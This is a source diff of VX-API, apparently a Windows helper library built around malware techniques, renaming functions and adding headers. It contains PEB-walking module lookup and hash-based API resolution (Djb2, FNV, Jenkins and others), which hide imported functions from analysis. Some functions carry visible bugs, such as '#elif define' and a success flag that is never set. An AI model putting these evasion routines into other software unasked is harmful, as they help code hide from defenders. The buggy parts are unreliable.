 }
 
-BOOL RfDeleteFileW(PWCHAR Path)
+BOOL DeleteFileExW(PWCHAR Path)
 {
 	HANDLE hHandle = INVALID_HANDLE_VALUE;
 
@@ -34,4 +36,4 @@ BOOL RfDeleteFileW(PWCHAR Path)
 	CloseHandle(hHandle);
 
 	return TRUE;
-}
+}

VX-API/GetCurrentDirectoryEx.cpp

@@ -1,22 +1,24 @@
-DWORD RfGetCurrentDirectoryA(DWORD nBufferLength, PCHAR lpBuffer)
+#include "Win32Helper.h"
+
+DWORD GetCurrentDirectoryExA(DWORD nBufferLength, PCHAR lpBuffer)
 {
 	PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
 
 	if (ProcessParameters->CurrentDirectory.DosPath.Length > nBufferLength)
-		return ERROR_FAILURE_RETURN;
+		return 0;
 
 	return (DWORD)WCharStringToCharString(lpBuffer, ProcessParameters->CurrentDirectory.DosPath.Buffer, ProcessParameters->CurrentDirectory.DosPath.MaximumLength);
 }
 
-DWORD RfGetCurrentDirectoryW(DWORD nBufferLength, PWCHAR lpBuffer)
+DWORD GetCurrentDirectoryExW(DWORD nBufferLength, PWCHAR lpBuffer)
 {
 	PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
 
 	if (ProcessParameters->CurrentDirectory.DosPath.Length > nBufferLength)
-		return ERROR_FAILURE_RETURN;
+		return 0;
 
 	if (StringCopyW(lpBuffer, ProcessParameters->CurrentDirectory.DosPath.Buffer) == NULL)
-		return ERROR_FAILURE_RETURN;
+		return 0;
 
 	return ProcessParameters->CurrentDirectory.DosPath.Length;
-}
+}

VX-API/GetCurrentProcessEx.cpp

@@ -0,0 +1,6 @@
+#include "Win32Helper.h"
+
+HANDLE GetCurrentProcessEx(VOID)
+{
+	return (HANDLE)((HANDLE)-1);
+}

VX-API/GetCurrentProcessIdEx.cpp

@@ -0,0 +1,6 @@
+#include "Win32Helper.h"
+
+DWORD GetCurrentProcessIdEx(VOID)
+{
+	return HandleToUlong(GetTeb()->ClientId.UniqueProcess);
+}

VX-API/GetCurrentThreadEx.cpp

@@ -0,0 +1,6 @@
+#include "Win32Helper.h"
+
+HANDLE GetCurrentThreadEx(VOID)
+{
+	return ((HANDLE)(LONG_PTR)-2);
+}

VX-API/GetCurrentUserSid.cpp

@@ -1,9 +1,15 @@
-/*
-hToken can be NULL
-DisposeProcessHandle closes hToken automatically
-if DisposeProcessHandle is FALSE you need to close it yourself
-The value returned by this function needs to be freed with HeapFree
-*/
+#include "Win32Helper.h"
+
+DWORD GetTokenInformationBufferSize(HANDLE hToken)
+{
+	PTOKEN_GROUPS TokenGroup = NULL;
+	DWORD dwReturn = ERROR_SUCCESS;
+
+	GetTokenInformation(hToken, TokenGroups, (LPVOID)TokenGroup, 0, &dwReturn);
+
+	return dwReturn;
+}
+
 LPWSTR GetCurrentUserSidW(HANDLE hToken, BOOL DisposeProcessHandle)
 {
 	typedef BOOL(WINAPI* CONVERTSIDTOSTRINGSIDW)(PSID, LPWSTR*);
@@ -19,18 +25,18 @@ LPWSTR GetCurrentUserSidW(HANDLE hToken, BOOL DisposeProcessHandle)
 	if (hAdvapi == NULL)
 		goto EXIT_ROUTINE;
 
-	ConvertSidToStringSidW = (CONVERTSIDTOSTRINGSIDW)RfGetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidW");
+	ConvertSidToStringSidW = (CONVERTSIDTOSTRINGSIDW)GetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidW");
 	if (!ConvertSidToStringSidW)
 		goto EXIT_ROUTINE;
 
-	if (!OpenProcessToken(RfGetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
+	if (!OpenProcessToken(GetCurrentProcessEx(), TOKEN_ALL_ACCESS, &hToken))
 		return NULL;
 
 	dwError = GetTokenInformationBufferSize(hToken);
 	if (dwError == 0)
 		goto EXIT_ROUTINE;
 
-	TokenGroup = (PTOKEN_GROUPS)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwError);
+	TokenGroup = (PTOKEN_GROUPS)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwError);
 	if (TokenGroup == NULL)
 		goto EXIT_ROUTINE;
 
@@ -46,7 +52,7 @@ LPWSTR GetCurrentUserSidW(HANDLE hToken, BOOL DisposeProcessHandle)
 
 			dwError = GetLengthSid(TokenGroup->Groups[dwIndex].Sid);
 
-			Sid = (PSID)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwError);
+			Sid = (PSID)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwError);
 			if (Sid == NULL)
 				goto EXIT_ROUTINE;
 
@@ -65,13 +71,13 @@ LPWSTR GetCurrentUserSidW(HANDLE hToken, BOOL DisposeProcessHandle)
 EXIT_ROUTINE:
 
 	if (!bFlag)
-		dwError = EhGetLastError();
+		dwError = GetLastErrorEx();
 
 	if (TokenGroup)
-		HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, TokenGroup);
+		HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, TokenGroup);
 
 	if (Sid)
-		HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, Sid);
+		HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, Sid);
 
 	if (hAdvapi)
 		FreeLibrary(hAdvapi);
@@ -100,18 +106,18 @@ LPSTR GetCurrentUserSidA(HANDLE hToken, BOOL DisposeProcessHandle)
 	if (hAdvapi == NULL)
 		goto EXIT_ROUTINE;
 
-	ConvertSidToStringSidA = (CONVERTSIDTOSTRINGSIDA)RfGetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidA");
+	ConvertSidToStringSidA = (CONVERTSIDTOSTRINGSIDA)GetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidA");
 	if (!ConvertSidToStringSidA)
 		goto EXIT_ROUTINE;
 
-	if (!OpenProcessToken(RfGetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
+	if (!OpenProcessToken(GetCurrentProcessEx(), TOKEN_ALL_ACCESS, &hToken))
 		return NULL;
 
 	dwError = GetTokenInformationBufferSize(hToken);
 	if (dwError == 0)
 		goto EXIT_ROUTINE;
 
-	TokenGroup = (PTOKEN_GROUPS)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwError);
+	TokenGroup = (PTOKEN_GROUPS)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwError);
 	if (TokenGroup == NULL)
 		goto EXIT_ROUTINE;
 
@@ -127,7 +133,7 @@ LPSTR GetCurrentUserSidA(HANDLE hToken, BOOL DisposeProcessHandle)
 
 			dwError = GetLengthSid(TokenGroup->Groups[dwIndex].Sid);
 
-			Sid = (PSID)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwError);
+			Sid = (PSID)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwError);
 			if (Sid == NULL)
 				goto EXIT_ROUTINE;
 
@@ -146,13 +152,13 @@ LPSTR GetCurrentUserSidA(HANDLE hToken, BOOL DisposeProcessHandle)
 EXIT_ROUTINE:
 
 	if (!bFlag)
-		dwError = EhGetLastError();
+		dwError = GetLastErrorEx();
 
 	if (TokenGroup)
-		HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, TokenGroup);
+		HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, TokenGroup);
 
 	if (Sid)
-		HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, Sid);
+		HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, Sid);
 
 	if (hAdvapi)
 		FreeLibrary(hAdvapi);
@@ -164,4 +170,4 @@ EXIT_ROUTINE:
 	}
 
 	return (bFlag ? pSid : NULL);
-}
+}

VX-API/GetCurrentWindowText.cpp

@@ -1,22 +1,24 @@
-DWORD RfGetCurrentWindowTextA(DWORD nBufferLength, PCHAR lpBuffer)
+#include "Win32Helper.h"
+
+DWORD GetCurrentWindowTextA(DWORD nBufferLength, PCHAR lpBuffer)
 {
 	PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
 
 	if (nBufferLength < ProcessParameters->WindowTitle.Length)
-		return ERROR_FAILURE_RETURN;
+		return 0;
 
 	return (DWORD)WCharStringToCharString(lpBuffer, ProcessParameters->WindowTitle.Buffer, ProcessParameters->WindowTitle.MaximumLength);
 }
 
-DWORD RfGetCurrentWindowTextW(DWORD nBufferLength, PWCHAR lpBuffer)
+DWORD GetCurrentWindowTextW(DWORD nBufferLength, PWCHAR lpBuffer)
 {
 	PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
 
 	if (nBufferLength < ProcessParameters->WindowTitle.Length)
-		return ERROR_FAILURE_RETURN;
+		return 0;
 
 	if (StringCopyW(lpBuffer, ProcessParameters->WindowTitle.Buffer) == NULL)
-		return ERROR_FAILURE_RETURN;
+		return 0;
 
 	return ProcessParameters->WindowTitle.Length;
-}
+}

VX-API/GetFileSizeFromPath.cpp

@@ -1,8 +1,10 @@
-LONGLONG RfGetFileSizeFromPathDisposeHandleW(PWCHAR Path, DWORD dwFlagsAndAttributes)
+#include "Win32Helper.h"
+
+LONGLONG GetFileSizeFromPathW(PWCHAR Path, DWORD dwFlagsAndAttributes)
 {
 	LARGE_INTEGER LargeInteger;
 	HANDLE hHandle = INVALID_HANDLE_VALUE;
-		
+
 	hHandle = CreateFileW(Path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, dwFlagsAndAttributes, NULL);
 	if (hHandle == INVALID_HANDLE_VALUE)
 		return INVALID_FILE_SIZE;
@@ -11,14 +13,14 @@ LONGLONG RfGetFileSizeFromPathDisposeHandleW(PWCHAR Path, DWORD dwFlagsAndAttrib
 	{
 		if (hHandle)
 			CloseHandle(hHandle);
-		
+
 		return LargeInteger.QuadPart;
 	}
-	
+
 	return INVALID_FILE_SIZE;
 }
 
-LONGLONG RfGetFileSizeFromPathDisposeHandleA(PCHAR Path, DWORD dwFlagsAndAttributes)
+LONGLONG GetFileSizeFromPathA(PCHAR Path, DWORD dwFlagsAndAttributes)
 {
 	LARGE_INTEGER LargeInteger;
 	HANDLE hHandle = INVALID_HANDLE_VALUE;
@@ -31,9 +33,9 @@ LONGLONG RfGetFileSizeFromPathDisposeHandleA(PCHAR Path, DWORD dwFlagsAndAttribu
 	{
 		if (hHandle)
 			CloseHandle(hHandle);
-		
+
 		return LargeInteger.QuadPart;
 	}
-	
+
 	return INVALID_FILE_SIZE;
-}
+}

VX-API/GetKUserSharedData.cpp

@@ -1,4 +1,6 @@
+#include "Win32Helper.h"
+
 PKUSER_SHARED_DATA GetKUserSharedData(VOID)
 {
 	return (KUSER_SHARED_DATA*)0x7FFE0000;
-}
+}

VX-API/GetLastErrorEx.cpp

@@ -0,0 +1,6 @@
+#include "Win32Helper.h"
+
+DWORD GetLastErrorEx(VOID)
+{
+	return GetTeb()->LastErrorValue;
+}

VX-API/GetLastNtStatusEx.cpp

@@ -0,0 +1,6 @@
+#include "Win32Helper.h"
+
+NTSTATUS GetLastNtStatusEx(VOID)
+{
+	return GetTeb()->LastStatusValue;
+}

VX-API/GetModuleHandleEx.cpp

@@ -1,4 +1,6 @@
-HMODULE RfGetModuleHandleA(LPCSTR lpModuleName)
+#include "Win32Helper.h"
+
+HMODULE GetModuleHandleExA(LPCSTR lpModuleName)
 {
 	PPEB Peb = GetPeb();
 	PLDR_MODULE Module = NULL;
@@ -12,7 +14,7 @@ HMODULE RfGetModuleHandleA(LPCSTR lpModuleName)
 		Module = (PLDR_MODULE)((PBYTE)Next - 16);
 		if (Module->BaseDllName.Buffer != NULL)
 		{
-			RfZeroMemory(wDllName, sizeof(wDllName));
+			ZeroMemoryEx(wDllName, sizeof(wDllName));
 			WCharStringToCharString(wDllName, Module->BaseDllName.Buffer, 64);
 			if (StringCompareA(lpModuleName, wDllName) == 0)
 				return (HMODULE)Module->BaseAddress;
@@ -22,7 +24,7 @@ HMODULE RfGetModuleHandleA(LPCSTR lpModuleName)
 	return NULL;
 }
 
-HMODULE RfGetModuleHandleW(LPCWSTR lpModuleName)
+HMODULE GetModuleHandleExW(LPCWSTR lpModuleName)
 {
 	PPEB Peb = GetPeb();
 	PLDR_MODULE Module = NULL;
@@ -44,4 +46,4 @@ HMODULE RfGetModuleHandleW(LPCWSTR lpModuleName)
 	}
 
 	return NULL;
-}
+}

VX-API/GetNumberOfLinkedDlls.cpp

@@ -1,4 +1,6 @@
-DWORD GetLinkedDllCount(VOID)
+#include "Win32Helper.h"
+
+DWORD GetNumberOfLinkedDlls(VOID)
 {
 	PPEB Peb = GetPeb();
 	PLDR_MODULE Module = NULL;
@@ -15,4 +17,4 @@ DWORD GetLinkedDllCount(VOID)
 	}
 
 	return dwCount;
-}
+}

VX-API/GetOSIdentificationData.cpp

@@ -0,0 +1,27 @@
+#include "Win32Helper.h"
+
+DWORD GetOSIdentificationData(DWORD Id)
+{
+	PPEB Peb = GetPeb();
+
+	switch (Id)
+	{
+	case 0:
+		return Peb->OSMajorVersion;
+
+	case 1:
+		return Peb->OSMinorVersion;
+
+	case 2:
+		return Peb->OSBuildNumber;
+
+	case 3:
+		return Peb->OSPlatformId;
+
+	default:
+		return 0;
+
+	}
+
+	return 0;
+}

VX-API/GetPeb.cpp

@@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+PPEB GetPeb(VOID)
+{
+#if defined(_WIN64)
+	return (PPEB)__readgsqword(0x60);
+#elif define(_WIN32)
+	return (PPEB)__readfsdword(0x30);
+#endif
+}
+
+PPEB GetPebEx(VOID)
+{
+	PTEB Teb;
+#if defined(_WIN64)
+	Teb = (PTEB)__readgsqword(0x30);
+#elif define(_WIN32)
+	Teb = (PTEB)__readfsdword(0x18);
+#endif
+	return (PPEB)Teb->ProcessEnvironmentBlock;
+}

VX-API/GetProcAddress.cpp

@@ -1,4 +1,6 @@
-DWORD64 __stdcall RfGetProcAddressA(DWORD64 ModuleBase, LPCSTR lpProcName)
+#include "Win32Helper.h"
+
+DWORD64 __stdcall GetProcAddressA(DWORD64 ModuleBase, LPCSTR lpProcName)
 {
 	PBYTE pFunctionName;
 	PIMAGE_DOS_HEADER Dos;
@@ -16,14 +18,14 @@ DWORD64 __stdcall RfGetProcAddressA(DWORD64 ModuleBase, LPCSTR lpProcName)
 	for (DWORD dwX = 0; dwX < ExportTable->NumberOfNames; dwX++)
 	{
 		pFunctionName = FunctionNameAddressArray[dwX] + (PBYTE)ModuleBase;
-		if(StringCompareA((PCHAR)pFunctionName, lpProcName) == 0)
+		if (StringCompareA((PCHAR)pFunctionName, lpProcName) == 0)
 			return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
 	}
 
 	return 0;
 }
 
-DWORD64 __stdcall RfGetProcAddressW(DWORD64 ModuleBase, LPCWSTR lpProcName)
+DWORD64 __stdcall GetProcAddressW(DWORD64 ModuleBase, LPCWSTR lpProcName)
 {
 	PBYTE pFunctionName;
 	PIMAGE_DOS_HEADER Dos;
@@ -51,4 +53,4 @@ DWORD64 __stdcall RfGetProcAddressW(DWORD64 ModuleBase, LPCWSTR lpProcName)
 	}
 
 	return 0;
-}
+}

VX-API/GetProcAddressDjb2.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 DWORD64 __stdcall GetProcAddressDjb2(DWORD64 ModuleBase, DWORD64 Hash)
 {
 	PBYTE pFunctionName;
@@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressDjb2(DWORD64 ModuleBase, DWORD64 Hash)
 	}
 
 	return 0;
-}
+}

VX-API/GetProcAddressFowlerNollVoVariant1a.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(DWORD64 ModuleBase, DWORD64 Hash)
 {
 	PBYTE pFunctionName;
@@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(DWORD64 ModuleBase, DWORD6
 	}
 
 	return 0;
-}
+}

VX-API/GetProcAddressJenkinsOneAtATime32Bit.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(DWORD64 ModuleBase, DWORD64 Hash)
 {
 	PBYTE pFunctionName;
@@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(DWORD64 ModuleBase, DWORD
 	}
 
 	return 0;
-}
+}

VX-API/GetProcAddressLoseLose.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 DWORD64 __stdcall GetProcAddressLoseLose(DWORD64 ModuleBase, DWORD64 Hash)
 {
 	PBYTE pFunctionName;
@@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressLoseLose(DWORD64 ModuleBase, DWORD64 Hash)
 	}
 
 	return 0;
-}
+}

VX-API/GetProcAddressRotr32.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 DWORD64 __stdcall GetProcAddressRotr32(DWORD64 ModuleBase, DWORD64 Hash)
 {
 	PBYTE pFunctionName;
@@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressRotr32(DWORD64 ModuleBase, DWORD64 Hash)
 	}
 
 	return 0;
-}
+}

VX-API/GetProcAddressSdbm.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 DWORD64 __stdcall GetProcAddressSdbm(DWORD64 ModuleBase, DWORD64 Hash)
 {
 	PBYTE pFunctionName;
@@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressSdbm(DWORD64 ModuleBase, DWORD64 Hash)
 	}
 
 	return 0;
-}
+}

VX-API/GetProcAddressSuperFastHash.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 DWORD64 __stdcall GetProcAddressSuperFastHash(DWORD64 ModuleBase, DWORD64 Hash)
 {
 	PBYTE pFunctionName;
@@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressSuperFastHash(DWORD64 ModuleBase, DWORD64 Hash)
 	}
 
 	return 0;
-}
+}

VX-API/GetProcAddressUnknownGenericHash1.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 DWORD64 __stdcall GetProcAddressUnknownGenericHash1(DWORD64 ModuleBase, DWORD64 Hash)
 {
 	PBYTE pFunctionName;

VX-API/GetProcessHeapEx.cpp

@@ -0,0 +1,6 @@
+#include "Win32Helper.h"
+
+HANDLE GetProcessHeapEx(VOID)
+{
+	return GetPeb()->ProcessHeap;
+}

VX-API/GetProcessPathFromLoaderLoadModule.cpp

@@ -1,26 +1,28 @@
-DWORD GetInMemoryModulePathFromLoaderLoadModuleA(DWORD nBufferLength, PCHAR lpBuffer)
+#include "Win32Helper.h"
+
+DWORD GetProcessPathFromLoaderLoadModuleA(DWORD nBufferLength, PCHAR lpBuffer)
 {
 	PPEB Peb = GetPeb();
 	PLDR_MODULE Module = NULL;
 	Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
 
 	if (nBufferLength < Module->FullDllName.Length)
-		return ERROR_FAILURE_RETURN;
+		return 0;
 
 	return (DWORD)WCharStringToCharString(lpBuffer, Module->FullDllName.Buffer, Module->FullDllName.MaximumLength);
 }
 
-DWORD GetInMemoryModulePathFromLoaderLoadModuleW(DWORD nBufferLength, PWCHAR lpBuffer)
+DWORD GetProcessPathFromLoaderLoadModuleW(DWORD nBufferLength, PWCHAR lpBuffer)
 {
 	PPEB Peb = GetPeb();
 	PLDR_MODULE Module = NULL;
 	Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
 
-	if(nBufferLength < Module->FullDllName.Length)
-		return ERROR_FAILURE_RETURN;
+	if (nBufferLength < Module->FullDllName.Length)
+		return 0;
 
 	if (StringCopyW(lpBuffer, Module->FullDllName.Buffer) == NULL)
-		return ERROR_FAILURE_RETURN;
+		return 0;
 
 	return Module->FullDllName.Length;
-}
+}

VX-API/GetProcessPathFromProcessParameters.cpp

@@ -1,22 +1,24 @@
-DWORD GetInMemoryModulePathFromProcessParametersA(DWORD nBufferLength, PCHAR lpBuffer)
+#include "Win32Helper.h"
+
+DWORD GetProcessPathFromProcessParametersA(DWORD nBufferLength, PCHAR lpBuffer)
 {
 	PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
 
 	if (nBufferLength < ProcessParameters->ImagePathName.Length)
-		return ERROR_FAILURE_RETURN;
+		return 0;
 
 	return (DWORD)WCharStringToCharString(lpBuffer, ProcessParameters->ImagePathName.Buffer, ProcessParameters->ImagePathName.MaximumLength);
 }
 
-DWORD GetInMemoryModulePathFromProcessParametersW(DWORD nBufferLength, PWCHAR lpBuffer)
+DWORD GetProcessPathFromProcessParametersW(DWORD nBufferLength, PWCHAR lpBuffer)
 {
 	PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
 
 	if (nBufferLength < ProcessParameters->ImagePathName.Length)
-		return ERROR_FAILURE_RETURN;
+		return 0;
 
 	if (StringCopyW(lpBuffer, ProcessParameters->ImagePathName.Buffer) == NULL)
-		return ERROR_FAILURE_RETURN;
+		return 0;
 
 	return ProcessParameters->ImagePathName.Length;
-}
+}

VX-API/GetRtlUserProcessParameters.cpp

@@ -1,4 +1,6 @@
+#include "Win32Helper.h"
+
 PRTL_USER_PROCESS_PARAMETERS GetRtlUserProcessParameters(VOID)
 {
 	return GetPeb()->ProcessParameters;
-}
+}

VX-API/GetSystemWindowsDirectory.cpp

@@ -1,4 +1,6 @@
-BOOL RfGetSystemWindowsDirectoryA(DWORD nBufferLength, PCHAR lpBuffer)
+#include "Win32Helper.h"
+
+BOOL GetSystemWindowsDirectoryA(DWORD nBufferLength, PCHAR lpBuffer)
 {
 	PKUSER_SHARED_DATA SharedData = GetKUserSharedData();
 
@@ -11,7 +13,7 @@ BOOL RfGetSystemWindowsDirectoryA(DWORD nBufferLength, PCHAR lpBuffer)
 		return FALSE;
 }
 
-BOOL RfGetSystemWindowsDirectoryW(DWORD nBufferLength, PWCHAR lpBuffer)
+BOOL GetSystemWindowsDirectoryW(DWORD nBufferLength, PWCHAR lpBuffer)
 {
 	PKUSER_SHARED_DATA SharedData = GetKUserSharedData();
 
@@ -22,4 +24,4 @@ BOOL RfGetSystemWindowsDirectoryW(DWORD nBufferLength, PWCHAR lpBuffer)
 		return FALSE;
 
 	return TRUE;
-}
+}

VX-API/GetTeb.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 PTEB GetTeb(VOID)
 {
 #if defined(_WIN64)
@@ -5,4 +7,4 @@ PTEB GetTeb(VOID)
 #elif define(_WIN32)
 	return (PTEB)__readfsdword(0x18);
 #endif
-}
+}

VX-API/HashFileByMsiFileHashTable.cpp

@@ -0,0 +1,92 @@
+#include "Win32Helper.h"
+
+//NOTE: PULONG must be pointed to an array of ULONG integers e.g. ULONG FileHash[4] = { 0 };
+BOOL HashFileByMsiFileHashTableW(PWCHAR Path, PULONG FileHash)
+{
+	typedef struct _MSIFILEHASHINFO {
+		ULONG dwFileHashInfoSize;
+		ULONG dwData[4];
+	} MSIFILEHASHINFO, * PMSIFILEHASHINFO;
+	typedef UINT(WINAPI* MSIGETFILEHASHW)(LPCWSTR, DWORD, PMSIFILEHASHINFO);
+
+	MSIGETFILEHASHW MsiGetFileHashW = NULL;
+	MSIFILEHASHINFO Hash = { 0 };
+	HMODULE hModule = NULL;
+	BOOL bFlag = FALSE;
+
+	Hash.dwFileHashInfoSize = sizeof(Hash);
+
+	hModule = LoadLibraryW(L"msi.dll");
+	if (hModule == NULL)
+		return FALSE;
+
+	MsiGetFileHashW = (MSIGETFILEHASHW)GetProcAddressW((DWORD64)hModule, L"MsiGetFileHashW");
+	if (MsiGetFileHashW == NULL)
+		goto EXIT_ROUTINE;
+
+	if (!IsPathValidW(Path))
+		goto EXIT_ROUTINE;
+
+	Hash.dwFileHashInfoSize = sizeof(MSIFILEHASHINFO);
+	if (MsiGetFileHashW(Path, 0, &Hash) != ERROR_SUCCESS)
+		goto EXIT_ROUTINE;
+
+	for (DWORD dwX = 0; dwX < 4; dwX++)
+		FileHash[dwX] = Hash.dwData[dwX];
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hModule)
+		FreeLibrary(hModule);
+
+	return bFlag;
+}
+
+BOOL HashFileByMsiFileHashTableA(PCHAR Path, PULONG FileHash)
+{
+	typedef struct _MSIFILEHASHINFO {
+		ULONG dwFileHashInfoSize;
+		ULONG dwData[4];
+	} MSIFILEHASHINFO, * PMSIFILEHASHINFO;
+	typedef UINT(WINAPI* MSIGETFILEHASHA)(LPCSTR, DWORD, PMSIFILEHASHINFO);
+
+	MSIGETFILEHASHA MsiGetFileHashA = NULL;
+	MSIFILEHASHINFO Hash = { 0 };
+	HMODULE hModule = NULL;
+	BOOL bFlag = FALSE;
+
+#pragma warning( push )
+#pragma warning( disable : 6384)
+	if ((sizeof(FileHash) / sizeof(ULONG)) < 4)
+		return FALSE;
+#pragma warning( pop )
+
+	Hash.dwFileHashInfoSize = sizeof(Hash);
+
+	hModule = LoadLibraryW(L"msi.dll");
+	if (hModule == NULL)
+		return FALSE;
+
+	MsiGetFileHashA = (MSIGETFILEHASHA)GetProcAddressW((DWORD64)hModule, L"MsiGetFileHashA");
+	if (MsiGetFileHashA == NULL)
+		goto EXIT_ROUTINE;
+
+	if (!IsPathValidA(Path))
+		goto EXIT_ROUTINE;
+
+	Hash.dwFileHashInfoSize = sizeof(MSIFILEHASHINFO);
+	if (MsiGetFileHashA(Path, 0, &Hash) != ERROR_SUCCESS)
+		goto EXIT_ROUTINE;
+
+	for (DWORD dwX = 0; dwX < 4; dwX++)
+		FileHash[dwX] = Hash.dwData[dwX];
+
+EXIT_ROUTINE:
+
+	if (hModule)
+		FreeLibrary(hModule);
+
+	return bFlag;
+}

VX-API/HashStringDjb2.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 DWORD HashStringDjb2A(PCHAR String)
 {
 	ULONG Hash = 5381;
@@ -18,4 +20,4 @@ DWORD HashStringDjb2W(PWCHAR String)
 		Hash = ((Hash << 5) + Hash) + c;
 
 	return Hash;
-}
+}

VX-API/HashStringFowlerNollVoVariant1a.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 ULONG HashStringFowlerNollVoVariant1aA(PCHAR String)
 {
 	ULONG Hash = 0x811c9dc5;
@@ -22,4 +24,4 @@ ULONG HashStringFowlerNollVoVariant1aW(PWCHAR String)
 	}
 
 	return Hash;
-}
+}

VX-API/HashStringJenkinsOneAtATime32Bit.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 UINT32 HashStringJenkinsOneAtATime32BitA(PCHAR String)
 {
 	SIZE_T Index = 0;
@@ -36,4 +38,4 @@ UINT32 HashStringJenkinsOneAtATime32BitW(PWCHAR String)
 	Hash += Hash << 15;
 
 	return Hash;
-}
+}

VX-API/HashStringLoseLose.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 DWORD HashStringLoseLoseA(PCHAR String)
 {
 	ULONG Hash = 0;
@@ -18,4 +20,4 @@ DWORD HashStringLoseLoseW(PWCHAR String)
 		Hash += c;
 
 	return Hash;
-}
+}

VX-API/HashStringRotr32.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 UINT32 HashStringRotr32SubA(UINT32 Value, UINT Count)
 {
 	DWORD Mask = (CHAR_BIT * sizeof(Value) - 1);
@@ -36,4 +38,4 @@ INT HashStringRotr32W(PWCHAR String)
 		Value = String[Index] + HashStringRotr32SubW(Value, 7);
 
 	return Value;
-}
+}

VX-API/HashStringSdbm.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 DWORD HashStringSdbmA(PCHAR String)
 {
 	ULONG Hash = 0;
@@ -18,4 +20,4 @@ DWORD HashStringSdbmW(PWCHAR String)
 		Hash = c + (Hash << 6) + (Hash << 16) - Hash;
 
 	return Hash;
-}
+}

VX-API/HashStringSuperFastHash.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 UINT32 HashStringSuperFastHashA(PCHAR String)
 {
 	INT Length = (INT)StringLengthA(String);
@@ -108,4 +110,4 @@ UINT32 HashStringSuperFastHashW(PWCHAR String)
 	Hash += Hash >> 6;
 
 	return Hash;
-}
+}

VX-API/HashStringUnknownGenericHash1.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 INT HashStringUnknownGenericHash1A(PCHAR String)
 {
 	PCHAR Pointer;
@@ -36,4 +38,4 @@ INT HashStringUnknownGenericHash1W(PWCHAR String)
 	}
 
 	return Hash;
-}
+}

VX-API/Internal.h

@@ -0,0 +1,490 @@
+#pragma once
+#include <Windows.h>
+
+#define PROCESSOR_FEATURE_MAX 64
+
+#define InitializeObjectAttributes(p, n, a, r, s) \
+{ \
+	(p)->Length = sizeof(OBJECT_ATTRIBUTES); \
+	(p)->RootDirectory = r; \
+	(p)->Attributes = a; \
+	(p)->ObjectName = n; \
+	(p)->SecurityDescriptor = s; \
+	(p)->SecurityQualityOfService = NULL; \
+}
+
+typedef struct _LSA_UNICODE_STRING {
+	USHORT Length;
+	USHORT MaximumLength;
+	PWSTR  Buffer;
+} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING;
+
